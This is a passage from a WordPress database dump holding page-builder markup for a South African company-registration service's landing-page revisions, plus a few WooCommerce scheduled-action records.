background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 09:40:03','2019-08-15 07:40:03','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32728,3,'2019-08-14 11:11:52','2019-08-14 09:11:52','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"60px\" padding_1_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" admin_label=\"Header\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"60px\" parallax__hover=\"off\" parallax_method__hover=\"on\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|phone\"]<h1>Where would you like to go first</h1>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.26.6\" custom_padding=\"29.6875px|0px|0|0px|false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.26.6\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color_gradient_start__hover=\"rgba(216,216,216,0)\" background_color_gradient_end__hover=\"rgba(190,196,195,0)\" use_background_color_gradient__hover=\"off\"][et_pb_cta title=\"Company Registrations\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" link_option_url=\"https://companyregistration.online/company-registrations/\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Maintaining Your Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" link_option_url=\"https://companyregistration.online/maintaining-your-company\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" custom_padding=\"29.6875px|0px|0|0px|false|false\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Tax Registration\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" link_option_url=\"https://companyregistration.online/tax-registrations\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Business Tools\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-14 11:11:52','2019-08-14 09:11:52','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32730,0,'2019-08-14 10:21:01','2019-08-14 10:21:01','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53e09458ed58.08693328-1RLLognNKd0fmHFvkZ9aiDvGMwaZqjlG','','','2019-08-14 12:21:08','2019-08-14 10:21:08','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32730',0,'scheduled-action','',3),(32731,0,'2019-08-14 10:21:01','2019-08-14 10:21:01','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d53e0946b1837.52095864-1GPThrRN5MQo1P6c7dT3rSELPeNF5QEj','','','2019-08-14 12:21:08','2019-08-14 10:21:08','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32731',0,'scheduled-action','',3),(32732,0,'2019-08-14 11:21:08','2019-08-14 